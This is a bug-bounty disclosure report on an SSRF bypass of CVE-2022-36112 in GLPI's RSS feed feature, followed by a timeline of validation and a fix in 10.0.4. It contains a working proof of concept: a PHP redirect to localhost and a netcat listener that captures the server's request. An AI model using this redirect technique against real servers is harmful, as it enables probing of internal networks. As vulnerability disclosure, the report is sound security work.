SSRF in feeds in glpi-project/glpi


Reported on

Oct 2nd 2022


By looking at this URL :, I understand that a SSRF was possible in the URL of the RSS feed, and in fact, this has been fix.

Howerver, I found a bypass to CVE-2022-36112.

Proof of Concept

To trigger the bug, setup a PHP server on a remote machine, and a file index.php containing this code :

header("Location: http://localhost:4444");

Then, on the server where glpi is running, put a listener on the port 4444.

On the RSS feed, put the URL "http://<your server>/index.php", and then hit enter.

You will see that, on port 4444, we receive this request :

user@vm:/var/www/glpi$ nc -lnvp 4444
Listening on 4444
Connection received on 59222
GET / HTTP/1.1
Host: localhost:4444
User-Agent: SimplePie/1.5.8 (Feed Parser;; Allow like Gecko) Build/20211224025350
Accept-Encoding: deflate, gzip, br
Referer: http://localhost:4444/
Accept: application/atom+xml, application/rss+xml, application/rdf+xml;q=0.9, application/xml;q=0.8, text/xml;q=0.8, text/html;q=0.7, unknown/unknown;q=0.1, application/unknown;q=0.1, */*;q=0.1


This vulnerability can be used by remote attacker to discover the internal network of the machine running glpi.

We are processing your report and will contact the glpi-project/glpi team within 24 hours. 8 months ago
We have contacted a member of the glpi-project/glpi team and are waiting to hear back 8 months ago
glpi-project/glpi maintainer has acknowledged this report 8 months ago
Alexandre Delaunay modified the Severity from Medium (4.3) to Low (3.5) 8 months ago
8 months ago


The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Alexandre Delaunay validated this vulnerability 8 months ago
w0rty has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the glpi-project/glpi team. We will try again in 7 days. 8 months ago
We have sent a second fix follow up to the glpi-project/glpi team. We will try again in 10 days. 7 months ago
We have sent a third and final fix follow up to the glpi-project/glpi team. This report is now considered stale. 7 months ago
Cédric Anne marked this as fixed in 10.0.4 with commit 8bd844 7 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Cédric Anne published this vulnerability 7 months ago
to join this conversation